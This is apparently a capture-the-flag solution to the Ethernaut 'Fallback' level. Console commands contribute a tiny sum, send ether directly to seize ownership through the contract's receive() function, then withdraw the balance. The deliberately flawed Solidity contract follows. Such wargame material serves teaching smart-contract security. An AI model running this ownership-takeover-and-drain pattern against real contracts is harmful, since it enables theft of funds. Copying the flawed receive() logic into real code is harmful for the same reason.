player
"0x77f2Dc5d302e71Ab6645622FAB27123E52e3e035"

instance
"0x4C30875C5069f7e649d838e5a287D7D53c99Bb4C" 

await contract.owner()
"0x9CB391dbcD447E645D6Cb55dE6ca23164130D008" 

await contract.contribute({from:player, value:toWei("0.0001", "ether")}) 

await getBalance(instance)
"0.0001" 

await contract.owner()
"0x9CB391dbcD447E645D6Cb55dE6ca23164130D008" 

await contract.sendTransaction({from:player, value:toWei("0.0001", "ether")}) 

await contract.owner()
"0x77f2Dc5d302e71Ab6645622FAB27123E52e3e035" 

await contract.withdraw()

---------------------------------------------------------------------------------

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import '@openzeppelin/contracts/math/SafeMath.sol';

contract Fallback {

  using SafeMath for uint256;
  mapping(address => uint) public contributions;
  address payable public owner;

  constructor() public {
    owner = msg.sender;
    contributions[msg.sender] = 1000 * (1 ether);
  }

  modifier onlyOwner {
        require(
            msg.sender == owner,
            "caller is not the owner"
        );
        _;
    }

  function contribute() public payable {
    require(msg.value < 0.001 ether);
    contributions[msg.sender] += msg.value;
    if(contributions[msg.sender] > contributions[owner]) {
      owner = msg.sender;
    }
  }

  function getContribution() public view returns (uint) {
    return contributions[msg.sender];
  }

  function withdraw() public onlyOwner {
    owner.transfer(address(this).balance);
  }

  receive() external payable {
    require(msg.value > 0 && contributions[msg.sender] > 0);
    owner = msg.sender;
  }
}
